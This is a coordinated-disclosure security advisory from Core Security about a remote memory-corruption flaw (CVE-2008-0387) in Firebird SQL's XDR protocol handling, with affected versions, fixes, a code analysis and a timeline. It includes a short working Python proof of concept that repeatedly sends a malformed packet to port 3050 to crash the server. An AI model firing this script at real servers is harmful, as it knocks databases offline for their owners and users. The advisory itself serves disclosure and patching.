Core Security Technologies Advisory 2007.1219

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Core Security Technologies - CoreLabs Advisory  
http://www.coresecurity.com/corelabs  
  
  
Firebird Remote Memory Corruption  
  
*Advisory Information*  
  
Title: Firebird Remote Memory Corruption  
Advisory ID: CORE-2007-1219  
Advisory URL: http://www.coresecurity.com/?action=item&id=2095  
Date published: 2008-01-28  
Date of last update: 2008-01-24  
Vendors contacted: Firebird SQL  
Release mode: Coordinated Release  
  
*Vulnerability Information*  
  
Class: Memory corruption  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
Bugtraq ID: 27403  
CVE Name: CVE-2008-0387  
  
*Vulnerability Description*  
  
Firebird [1][2] is a relational database that runs on Linux, Windows,  
and a variety of Unix platforms. The Firebird Project is a commercially  
independent project of C and C++ programmers, technical advisors and  
supporters developing and enhancing a multi-platform relational database  
management system based on the source code released by Inprise Corp (now  
known as Borland Software Corp) on 25 July, 2000.  
  
The Firebird database manager contains an Integer Overflow in the  
processing of certain tags on the XDR protocol used for communication  
with the server. This led the server to corrupt the process memory and  
crash. Repeated attempts are followed by a crash of the process in  
charge of restarting the database server. This may also grant attackers  
remote execution of arbitrary code on servers running Firebird.  
  
*Vulnerable packages*  
  
. Firebird SQL 1.0.3 and before.  
. Firebird SQL 1.5.5 and before.  
. Firebird SQL 2.0.3 and before.  
. Firebird SQL 2.1.0 Beta 2 and before.  
  
*Non-vulnerable packages*  
  
. Firebird SQL 1.5.6 (to be released)  
. Firebird SQL 2.0.4 (to be released)  
. Firebird SQL 2.1.0 RC1  
  
*Vendor Information, Solutions and Workarounds*  
  
Firebird v2.1.0 RC1 fixes this vulnerability and is available for  
download at http://firebirdsql.org/index.php?op=files&id=fb210_RC1  
  
The fix will also be included in versions v1.5.6 and v2.0.4. Version  
2.0.4 will be released in February. The version 1.5.6 release is  
expected later this year.  
  
The issue is registered [3] in Firebird Tracker as CORE-1681.  
  
*Credits*  
  
This vulnerability was discovered and researched by Damian Frizza with  
assistance of Alfredo Ortega from Core Security Technologies.  
  
*Technical Description / Proof of Concept Code*  
  
The memory corruption happens when the parser (src/remote/protocol.cpp)  
receives any of the following operations with invalid data:  
  
op_receive  
op_start  
op_start_and_receive  
op_send  
op_start_and_send  
op_start_send_and_receive  
  
The parser fails to properly sanitize certain variables before use. We  
can see that in the file src/remote/protocol.cpp there are the following  
assignments directly from the packet buffer to the data structure,  
without any validation (The MAP macro doesn't have any range checking):  
  
src/remote/protocol.cpp:417  
  
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));  
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_incarnation));  
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_transaction));  
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_message_number));  
/* Changes to this op's protocol must mirror in xdr_protocol_overhead */  
return xdr_request(xdrs, data->p_data_request,  
data->p_data_message_number,  
data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);  
  
And in the function xdr_request(), the variable data->p_data_request (as  
request_id) is used to index an array:  
  
...  
rrq* request = (rrq*) port->port_objects[request_id];  
...  
  
Corrupting memory structures and causing a DoS of the server, with  
possible execution of code. The same happens with the variable  
data->p_data_message_number.  
  
The following python PoC causes a remote Denial of service and  
demonstrates the bug:  
  
##Firebird DoS  
##Damian Frizza - Core Security Exploit Writers Team  
##tested against Firebird-2.0.3.12981-1-Win32.exe and  
##Firebird-2.1.0.16780_0_Win32.exe  
  
##fbserver.exe 2.0.3  
##005637D0 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]  
##005637D4 0FB700 MOVZX EAX,WORD PTR DS:[EAX]  
##005637D7 83EC 50 SUB ESP,50  
##005637DA 56 PUSH ESI  
##005637DB 8BF1 MOV ESI,ECX  
##005637DD 8B8E AC000000 MOV ECX,DWORD PTR DS:[ESI+AC]  
##005637E3 3B41 08 CMP EAX,DWORD PTR DS:[ECX+8] <----  
##CRASH HERE  
  
  
import socket  
import time  
  
def getTargetIP():  
return '192.168.xxx.xxx'  
  
  
port= 3050  
op = '\x4a'  
  
  
packet = '\x00\x00\x00' + op + 'A' * 2000  
  
  
##Making the connection and sending the data 5 times, fbguard.exe fails  
##to restart the service.  
  
for i in range(0, 5):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((getTargetIP(), port))  
s.send(str(packet))  
s.close()  
time.sleep(1)  
  
*Report Timeline*  
  
2008-01-04: Initial notification sent by CoreLabs to Firebird SQL  
development team.  
2008-01-08: Notification acknowledged by Firebird SQL development team.  
2008-01-08: Technical details sent by Core to Firebird SQL dev. team.  
2008-01-10: Firebird SQL dev. team notifies Core that a fix has been  
produced, and will be released in Firebird versions v1.5.6, v2.0.4 and  
v2.1.0 RC1.  
2008-01-10: CoreLabs acknowledges information about fixes and requests  
date of the v2.1.0 RC1 release to the Firebird dev. team.  
2008-01-15: Firebird dev. team confirms vendor information and dates of  
fixed versions.  
  
  
*References*  
  
[1] http://sourceforge.net/projects/firebird/  
[2] http://www.firebirdsql.org/  
[3] http://tracker.firebirdsql.org/browse/CORE-1681  
  
*About Corelabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating the future needs and requirements for information  
security technologies.  
We conduct our research in several important areas of computer security  
including system vulnerabilities, cyber attack planning and simulation,  
source code auditing, and cryptography. Our results include problem  
formalization, identification of vulnerabilities, novel solutions and  
prototypes for new technologies.  
CoreLabs regularly publishes security advisories, technical papers,  
project information and shared software tools for public use at:  
http://www.coresecurity.com/corelabs/  
  
*About Core Security Technologies*  
  
Core Security Technologies develops strategic solutions that help  
security-conscious organizations worldwide develop and maintain a  
proactive process for securing their networks. The company's flagship  
product, CORE IMPACT, is the most comprehensive product for performing  
enterprise security assurance testing. IMPACT evaluates network,  
endpoint and end-user vulnerabilities and identifies what resources are  
exposed. It enables organizations to determine if current security  
investments are detecting and preventing attacks. Core augments its  
leading technology solution with world-class security consulting  
services, including penetration testing and software security auditing.  
Based in Boston, MA and Buenos Aires, Argentina, Core Security  
Technologies can be reached at 617-399-6980 or on the Web at  
http://www.coresecurity.com .  
  
*DISCLAIMER*  
  
The contents of this advisory are copyright (c) 2008 CORE Security  
Technologies and (c) 2008 CoreLabs, and may be distributed freely  
provided that no fee is charged for this distribution and proper credit  
is given.  
  
*PGP/GPG KEYS*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.6 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org  
  
iD8DBQFHnhGQyNibggitWa0RAjcmAJ94rGoTbUBQALmV5yOudJfL4B038QCgpzNw  
dFwDpUnOO6OHI0L45rIwyFU=  
=dlYg  
-----END PGP SIGNATURE-----  
  
`